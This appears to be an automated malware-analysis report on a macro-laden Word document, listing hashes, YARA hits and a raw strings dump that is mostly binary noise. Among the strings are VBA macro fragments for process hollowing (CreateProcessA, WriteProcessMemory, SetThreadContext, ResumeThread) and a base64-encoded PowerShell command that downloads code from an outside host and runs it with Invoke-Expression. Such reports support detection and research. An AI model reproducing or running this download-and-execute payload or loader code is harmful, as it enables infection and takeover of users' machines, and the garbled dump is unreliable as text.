Sample details: a0567cb99e6ac9b17001c2a07e6f0ea4

Hashes
MD5: a0567cb99e6ac9b17001c2a07e6f0ea4
SHA1: 949966a12a0eb05175d2470e55d246655e4a8460
SHA256: 96718d85cc1c33f425a0a91001ed2bab069f78e79877776f3427c81a1c1432e3
SSDEEP: 6144:HajomTrfqhc0Z+lpqXqLIZDVwcF4BVYf6dVTz/gk9Mv:HajzCInqaLC3fyzT
Details
File Type: Composite
Added: 2019-06-18 13:31:41
Yara Hits
YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Antivirus | YRP/WMI_strings | YRP/Misc_Suspicious_Strings | YRP/ThreadControl__Context | YRP/Big_Numbers1 | FlorianRoth/PowerShell_in_Word_Doc |
Strings
		http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:A57EFBB97A9011E99055857DF37FD589" xmpMM:InstanceID="xmp.iid:A57EFBB87A9011E99055857DF37FD589" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:702AFF777A8F11E9A3B0CBFAC86C5A22" stRef:documentID="xmp.did:702AFF787A8F11E9A3B0CBFAC86C5A22"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
P[y<~*
.f|OI`n
<nW'wi
3xc-3HUu
e!_]Xn
U@4RtP
7guf"d
8id1&B
UnP3Hd
fzO5gik
P{s{eh
azc/uo
'QIg.H
e'@/I^
bT.H.@
tfO+.;%$
|z~Rq#C
O%ge&N
5g23*0!
uUB<z/
tN,TjI
rD\/ROe%
$!@]A%	P
'egEfC
wwkgm-
+s)]Qdi
)31Iw.	n!
X/-t DN
+yn4	q%
VvvV3e
.aFUfM
M,W-en
#G7/EE
9s<-st
x#~dq4HQ\
Kki!x$
.-mnP%
;td#B("
P$R?6H
QA:qf:
;A*J#v
Ph-p]a
[Ce$Mvm
=KdrVI}
H	}woF<4
S^;{(!gzN
nr+,@l
F5y<DF>q
_{;(d"-
f7+#xx
K\OQcly
#Bh!'Et
(Ha_UTp
ON'Yl"e
vG!bu,
Aaygi{m%
{8&niNO
9-zrH#
TY[|SZ
AW?R\{K
J][Co=
kf7m*\
V{"[Y,
Pr3uwT\t
zh9kOy9,
6=7b1y&
(|73?4
$zjv#01(
$zjv#1
lz[\Ky
[RmRFfa2
,Tn!}:
Ko$q8Y
~d.c1E*
_WAVfg
U_Vr4:
Qn\\rK
^_KdT~nv3
]|[<bb}yx
]6_!z"cu8
ll^_+ssf
f.["Qu"
	]Cm%H:j5
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:B4F834E27A9011E9949AF1162A4C9C2F" xmpMM:InstanceID="xmp.iid:B4F834E17A9011E9949AF1162A4C9C2F" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:799112E47A8F11E99855FB045EF1C463" stRef:documentID="xmp.did:799112E57A8F11E99855FB045EF1C463"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
br$53ct
F-QUk@.
{:jOWM
I.$EDTEMi
TD$^&q
omss2Cm
UUWDDD
+Mhk#?
1O$Od3
O	qa,'
"""&c9}:
g"j6>k
#Y?iQ:
f-lc}c
JWE+R9
FG3RG%
p5{2,K
h$G,OM
4D^&=h
|oz"A2
G>4j;]
iTOIu4
boynKv\
/ms	kl
DUG*hY
S<w>c1
U]UUzT
toN,z+\
1*3HfXVt
[Z"3; 
UDu4UN4Q
5z)U9ijjkji
kJ+[Wf
{Nk#kR
lp[:hel
uW1kDVbq
#seJ5W}$
#{qiii<
sYKTr[\
Mo*]$N
=[g.kl
v'TjoE
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:9CF663487A9011E9BF56E5D98EA93E3D" xmpMM:InstanceID="xmp.iid:9CF663477A9011E9BF56E5D98EA93E3D" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:50825AD47A8F11E984DEEAD710724B79" stRef:documentID="xmp.did:50825AD57A8F11E984DEEAD710724B79"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
;Q@QQxv
z{),o~:
DkQ5UU
r*;j-*
+jDf8u>
O	qa,'
"""&c9}:
&"xqt\
^45m[V
XZIgkt
Lb*X9)XQ^
Lbw$N7=
f71118
D1]jZq
71[>_eU
ew<73C
bbq-%@
#b|s6dk
nDt7/z5
boznKv\
I$DUkU
tnTG"=
:basvXL>6
;gtn_R
f|9:jj
wqK^g{t]Q
vo_Rv|
\don---'
:E"&f8
bb&1$K
nrT	Wq
@lN`TDN
*{4P%4D
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:4EBE15567A9011E9A92DED7F8434DB5A" xmpMM:InstanceID="xmp.iid:4EBE15557A9011E9A92DED7F8434DB5A" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0A10C9D37A8F11E99AF3EAE5AAECF930" stRef:documentID="xmp.did:0A10C9D47A8F11E99AF3EAE5AAECF930"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
^@cEEb
r?#1>	s
ZWdmEs
{msUdnYd
TsWEEM
O[f=#|
mS/qws{
[RvON"<c)j
g$y+Z[
T9jj^:
SZr3kZ
oY[{kg$
"""&c9}:
D;Ef5c3
f-lc}c
u&vY_,
jUUtCT
Lb*X9)XQ^
wkiBz4
$/r"9clh
eMM"f&cl3
f^=2/n
tk4i#{
h$G,OM
{ewcw-
G>4j;]
v"6m8m
/ms	kl
DUG*hY
w	,oDJ+
$Otr1Q
5EEMQPLdb
tnTG"=
3?n"9bs
6UkcY^
kJ+[Wf
68#z,j
}+jLbmZ
{,OOKb
#seJ5W}$
q4W3*#Z
DR>)Y,k
DW"q]{
iN`7p^
+Q@+Qk
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:BC8891857A9011E9A628CD8921CB27F7" xmpMM:InstanceID="xmp.iid:BC8891847A9011E9A628CD8921CB27F7" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:452F9FE87A8F11E9955C883D124708A0" stRef:documentID="xmp.did:452F9FE97A8F11E9955C883D124708A0"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
                                                            
5Ayip\ 
G$r0>7
G#^c:^
sjxvPK
nwc26W"
syjo2WF
)kso}l
PX                                          
<L&18B
s]GTw4(-b
:I("73
{uFcyc
 :S',ja-
[Wmel.6
oKIi4#
G3[w$b
                               
GB"`ay
$                                
3[7>P--CM
-lY#\n"d
L@P& b
L@P& c
Cq]:gD
w\~!\}G
}Jw`.$k
edAue P
dQ2&pdm
h<x4P*
"f>9]+,
(=              
!R6&TmlW[
Xh@@@@@@@@A
        
(=              
OCK}U:
@@@@@@@@AG
MJ.[<O
,4         
YsfcNSDL
Y;73ck
         
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
      
k%iux89
P{H#[yN
\u0p$w=
.&2VG2WKH
J;vZ^\
O6&FjuT
?]"4e<
5GGjeuSJ
h<M40D
Xob1Ou
:h@Ake
<w-5sx
fB-Q:OM
(6                
MKA=r:
chckZ4
               
utU39j
,ZT7>K
VF[u$Q
a+#"W1
5uRk3/=
LL:Rb!+3
         
*54TTuT
T/Eg)i
@@@@@@@@A
        
>l7rmV<
@@@@@@@@@A
         
wn-i7-
@@@@@@@@AI
^dLqk]^
2	n-of0>
@@@@@@@@A
        
nybl|O
M.:'KqS3
P@@@@@@@@@@@@@@@@@@@@@@A
;w>vs cdi/o
5A	1n]
sKrPmC
@@@@@@@@A
        
$tq|Dhh->
q;[db7M
@@@@@@@@A
        
aGVQS(
@@@@@@@@A
lr:2/C
;+1lNQ
7O]KND
@@@@@@@@A
        
q1"(#2>
4TwEMuF
>s4HZIi
HjkWUL
         
P<B<*ok
P<B<*ok
P<B<*ok
P<B<*ok
@@@@@@@@A
        
opcHiq.=
sc}hKK
@@@@@@@@A
        
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
                                                            
+xnKne
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
      
      
                    
k[K[yr,
Yc|\n[ 'P.
?jgn7^=
s71.~(D
M==(>a
<<qkj;
Gm#ywq
@@@@@@@@@@@@@@@@@@A
        PR
                   
$RQ]ta
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:9588DFF87A9011E98F05CBA840ADC280" xmpMM:InstanceID="xmp.iid:9588DFF77A9011E98F05CBA840ADC280" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:309CDD097A8F11E9BAE1FDC03B9EE600" stRef:documentID="xmp.did:309CDD0A7A8F11E9BAE1FDC03B9EE600"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
3"BRb4
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
 C}e<'<
UPu[/U
:M1]@:
XHDt;?W
@ri5jm}
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
FT1{yD
.-H\DX
KbEygc
*W[t n
lp9)wntr
|B@v!v
p&!gjtU
                   
@@@@@@@@A
sk+RX%
f/d-gGn
RM$@DE
W]:Pac
V7n4Ah
                                                            
q7nw^+t
EWr=4}fK
>zV0)v-w
JV0)v,
>zV0)v'#!
>zV0)v(
,              
cZ=8ty
,MVz;W
WO];(0
,              
'l?8	3
k:YwvE
~==h7c
,              
M^&=|TT
%(X@@@@@@@@@@@@@AI
*m85% 
,nr34LQ
:166fb
@@@@@@@@A
dDX8N6g}!0
        
&*3kfwrw
g0b)9m
!wb1&qgn
fw&fwfj
l@@@@@@@@A
9hp*?K
<Pby,|bDw1
w1jy|Pz
2@@@@@@@@A
u{7w]4
Tj5iVf
        
oZH&                   
                  
:_O[;t
,              
R1`Xhq
,              
,              
/L.c'#
,              
'l?7/d
{yJ	"p
mOGv}L
        
,              
F]G;q|R
F]G;r|N
TvwA.+
yyq8013
7ujy+Lvf[
u[S+os
      
d0B14#
8#)L9g#
Xx3pfn
        
!ipre1
_mWj=;
kbqaoB
EynW%8
6	o5?"
)H!{6f
@@@@@@@@A
{7kEm%
{WnEsiu
\t2FrG116
(%_aqw
)YYGnS
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
        
.Y4/I9eJ
:r(LZ1
@@@@@@@@A
,sAe3^[Br
QiL;qvji
$@@@@@@@@@@A_
              
K[E+Tu7]:
<@@@@@@@@@@@@A_
              
ZM,WpZ
6-phcv
oeh1?2
Hr>:NT
%;v7v.
]=TS]=9e(
r3""p"~
!2"'rq
$fY7>hc
;;|[[8Ey
@@@@@@@@A
9[	Awl
1'&b#n.
v 'xop
Bf{j7j
bo-'=:&
RY[Mg70
VN+D5xm2
@@@@@@@@A
VN+D5xm2
l@@@@@@@@@@@@@@@@AY%
pY7>hc
      
ncpy"'	
6s)1Er
mr-su$
]ZOyik
Zy=<PE
#w<ROy
                                                            
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
w toc'v
3Vq%'#q
:\TZaG
Qg20pp
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
$RQ]ta
RedCrystal
Normal.dotm
RedCrystal
Microsoft Office Word
<b:Sources SelectedStyle="\APA.XSL" StyleName="APA" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"></b:Sources>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<ds:datastoreItem ds:itemID="{B2413A48-95DB-4846-8AE4-960CFBF85B4E}" xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml"><ds:schemaRefs><ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/></ds:schemaRefs></ds:datastoreItem>
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
!Offic
DF8D04C-
5BFA-101@B-BDE5
ram File
s (x86)\@Common
Microsof
t Shared
\OFFICE1
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
[+] |__ Applied context to the new thread
UwBlAHQALQBBAGwAaQBhAHMAIABzAHcAIAAtAFYAYQBsAHUAZQAgACIASQBuAFYAbwBrAGUALQBlAFgAcAByAGUAUwBzAEkAbwBuACIAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AG'
kAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7'
ACAAJAB0AHIAdQBlACAAfQA7ACAAJABiAGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJABiAGMALgBDAHIAZQ'
BkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAGEAdQB0AGgA'
JwAsACAAJwAhACkAJgAlAEcAYQBvAGwAVABdAEgAfABwAEoATwBqAGUATgBjAHsAbQBTADcANABfAC0AWABkAFIAWgBZAH0AJwApADsAcwBsAGUAZQBwACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtAC'
AAIAAtAE0AYQB4ACAAMQA1ADAAKQA7ACQAZABzAD0AJABiAGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAHUAcABhAGMAYwBvAHUAbgB0'
AC4AbgBlAHQALwB1AHIAbAAvAHYAaQBlAHcAJwApADsAcwBsAGUAZQBwACAAMgAwADAAOwBzAHcAIAAkAGQAcwA='
winmgmts:{impersonationLevel=impersonate}!\\ 
\root\cimv2
Select * from Win32_Process  WHERE Name = "WINWORD.EXE" AND CommandLine Like "%win%" 
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
 Win64 T@hen
rSafe Su
b RtlMov
eMemory 
Lib "KER
NEL32" (
ByVal lD@estina
6A@s Long
lLength
1GetModu
leFile
Alias "
H+lp-A
E2nSizeF+
eProce>s
G+lpxApp
pCommand
	bInh@
Environ
!R!Curr
Di0rect
StartupI
TUPINFO,
{ERPRO CESS_
ATION)E
#Contex
CONTEXT
^Readd8]
AXddr!P@
pBufferP
9Number
OfBytes!
Vi@:al
AllocExU+
qBjTyp
@:_FBFWri
itCodB&I
OwOwOw`tOw
o-o-j-
?&?&1&Op
pnd If
IMAGE_NU
MBEROF_D
IRECTORY
_ENTRIE'
S = 16
Private 
Const IM
AGE_SIZE
OF_SHORT
MAXIMUM_
EXTENSIObN
80387_R
EGISTER
f Win64 
Type M1
 As LongC
DOS_@HEADER
)e@_magic
)I@nteger
"@parhdr
$m@inallo
KhsumQ
7ovnoQ
res(4 - 
oemid	
IRECTORY
}Virtual8Add
Machin
Number
OfSecti
ETimeD
rToSymb
olTabl
alHeade
Characte
ristic"
orLinker0Vers
a8`OfCod
Initialu`=d`.a
EAlignme
*Operati
ngSystem
@Sub>s
ValuwB
DllYnA
ckReserv
Etack`Commiv"o
IRvaA,nd
7DiBr .ory(
[N`UMBER@
ENTRIESGa
] #Els
0$k?F6@
/G/G/G
/G/G/G
S }atur
ecName
ROCESS_I
NFORMAQ
hProce
rocessId
 As Long
Private
 STARTUP
lpReservBe
pDesktop
ountChar
FillA2t
&wShow@Window
nteger
hStdInpuFt
E0rror
OATING_S
AVE_AREA
C-Control
OffseF1
Select
egisterA
(SIZE_O
F_80387_
REGISTER@S - 1)
Sparde0
C@ONTEXT
If @z64 T8hen
Drf?k4D
cLegacy
Vbiee(26
LastBra
nchToRo&!
Except
	#Elsds@
FloatSa
4s(MAX
IMUM_SUP
PORTED_
ENSION
t MEM_CO
MMIT = &
RESERVE
ADWRITc
SUSPEND
_FUlLL
DOS_SI@GNATURS
E_MACHIN@E_I386
ublic F(uncQZ 1/Ar
rayLengt
ngth = U
Bound(ba
Bytes) -
End Func@tion
P@rivate
ArrayTo@String
(p) As
Dim s`trRes
&Integ
@= 0 To
K& Chr
FilheTo
= 0Free
Op<enAMA
nary Acc
ess Read}A
 Space(A
^Get qC
bFromUni
on AA'A
, bChar
.gkjfs
gksjkaso
iopfajv"_
ublic Su
b sgsdkj
lkadn	
'DbiArgume|ntH
K@*u@ctDOSH
8IMAGE_@
_HEADER
Long Ptr: 
= xVar
all RtlM
oveMemor
0)), 64
}!3ja@g
IGNATURE
lfanew
SIZEOF_
gnature
Win647
.M achin
LE_MACHI
NE_I386
(02G9|
Inf`ormat
ROCESS_I
NFORMATI
bpF`, $0&3
CREATE_S
USPENDED
btTerm
sMemory 
= ReadPr
ormation
L, lIm
ageBaseA@ddrLoc
IZEOF_AD
DRESS, 0
'Call 
Terminat
DExi t Sub
	nd If
e As Lon0gPtr
VirtualA
llocEx
SizeOf
, MEM_CO
MMIT +
ERVE, PA
GE_EXECU
TE_READW0RITEHe
6eWriF
dFor j
o 1999
@Next j
(0)), bn
d@iCount!cI
ntege$cA
SECTION_
Xon1Fil
.Numbe
e_l`fanew
3String:
= Byte
ArrayToc
!	D/a&
i`krTo
(vRX#-
x t.Rdx@
[+] |__ 
Applied 
@ to th
ResumeS
nt_close
A'gkjfs
gksjkaso
iopfajvdg
`oolea
jgj8ksv!
+ Chr(6
ksjjgjks
v = Fkjh
+ Chr(
9,^5*/92
*.83*.12
5+/50j/
Dim HJ
NLksdjb
ajklvnh
o	o	i	
%aNzXHdj
wBlAHQAL
QBBAGwAa
QBhAHMAI@ABzAHcp
tAFYAYQB
sAHUAZQA
gACIASQB
bwBrAG
lAFgAc
bAFMAeQq
BtAC4ADTg
gB2AG"#bA
pAG4Ad
ABNAGEAb
yAF@0AOgA6q
AYwBhAHQ
AZQBWAGE
AbABpAGQ
AYQB0AGk
AbwBuAEM
<sAGwAYg
BhAGMAaw
AgAD0AIA@B7"
Hdj2 = "@ACAAJA
~H@IAdQBl
~IA$A9
ALQBvAGILAa
_F@MAeQBz
t AC4AT
LgBXAGU
dAB3AG8A
wAK8AAn
wAhACkAJ
gAlAEcA
wAVABdA
EgAfABwA
EoATwBq
jAHsAbQ
BTADcANA
BfAC0AWA
{FIAWgBZ
pAD sAcwB
aH)5A)A
MPtAE0
QA1ADAAK
)A6A@C8ALwB
rAHUAcA
CMgAwy
sdjbjksv
ajklvnh
kjfsgksj
kasoiopf
	Dim st
rCompute
jWMIServ ice, 
ocess, c
As IntegTer
Dir(Fkjh
jg@.v)!
ToByteAr
l sgsdkj
Gajhabv
lkadnI
H4For 
I  To 2G
bject("w
inmgmts:
{imperso
nationLe
e}!`\\" &	h
\root\ci
Jh.ExecQu
ery("Sel
 * from
 Win32_$j
  WHERE 
INWORD.E
XE`bAND `y
mandLine
 Like "":% 
a#Ea|chHw
@P@rivate
A  Docump1_o8pen
cQMShap
In Acti
ntrast
 >= 0.50
ghtn [
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
 ================================================================================
                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
 ================================================================================
 ================================================================================
                           ~~~ WINDOWS STRUCTURES ~~~
 ================================================================================
 Constants used in structure definitions
ULONGLONG Low;
LONGLONG High;
 https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
WORD e_magic;
WORD e_cblp;
WORD e_cp;^
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;^
WORD e_sp;^
WORD e_csum;
WORD e_ip;^
WORD e_cs;^
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];^
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
DWORD   VirtualAddress;
DWORD   Size;
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
WORD    Machine;
WORD    NumberOfSections;
DWORD   TimeDateStamp;
DWORD   PointerToSymbolTable;
DWORD   NumberOfSymbols;
WORD    SizeOfOptionalHeader;
WORD    Characteristics;
 https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
WORD        Magic;^
BYTE        MajorLinkerVersion;
BYTE        MinorLinkerVersion;
DWORD       SizeOfCode;
DWORD       SizeOfInitializedData;^
DWORD       SizeOfUninitializedData;
DWORD       AddressOfEntryPoint;
DWORD       BaseOfCode;
ULONGLONG   ImageBase;
DWORD       SectionAlignment;
DWORD       FileAlignment;^
WORD        MajorOperatingSystemVersion;
WORD        MinorOperatingSystemVersion;
WORD        MajorImageVersion;
WORD        MinorImageVersion;
WORD        MajorSubsystemVersion;^
WORD        MinorSubsystemVersion;^
DWORD       Win32VersionValue;
DWORD       SizeOfImage;
DWORD       SizeOfHeaders;^
DWORD       CheckSum;
WORD        Subsystem;
WORD        DllCharacteristics;
ULONGLONG   SizeOfStackReserve;
ULONGLONG   SizeOfStackCommit;
ULONGLONG   SizeOfHeapReserve;
ULONGLONG   SizeOfHeapCommit;
DWORD       LoaderFlags;
DWORD       NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
WORD    Magic;
BYTE    MajorLinkerVersion;
BYTE    MinorLinkerVersion;
DWORD   SizeOfCode;
DWORD   SizeOfInitializedData;
DWORD   SizeOfUninitializedData;
DWORD   AddressOfEntryPoint;
DWORD   BaseOfCode;
DWORD   BaseOfData;
DWORD   ImageBase;^
DWORD   SectionAlignment;
DWORD   FileAlignment;
WORD    MajorOperatingSystemVersion;
WORD    MinorOperatingSystemVersion;
WORD    MajorImageVersion;^
WORD    MinorImageVersion;^
WORD    MajorSubsystemVersion;
WORD    MinorSubsystemVersion;
DWORD   Win32VersionValue;^
DWORD   SizeOfImage;
DWORD   SizeOfHeaders;
DWORD   CheckSum;
WORD    Subsystem;^
WORD    DllCharacteristics;
DWORD   SizeOfStackReserve;
DWORD   SizeOfStackCommit;^
DWORD   SizeOfHeapReserve;^
DWORD   SizeOfHeapCommit;
DWORD   LoaderFlags;
DWORD   NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER OptionalHeader;
 https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
UCHAR Name[IMAGE_SIZEOF_SHORT_NAME];
ULONG Misc;
ULONG VirtualAddress;
ULONG SizeOfRawData;
ULONG PointerToRawData;
ULONG PointerToRelocations;
ULONG PointerToLinenumbers;
WORD NumberOfRelocations;
WORD NumberOfLinenumbers;
ULONG Characteristics;
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
HANDLE hProcess;
HANDLE hThread;
DWORD dwProcessId;^
DWORD dwThreadId;
 https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
DWORD   cb;
LPSTR   lpReserved;
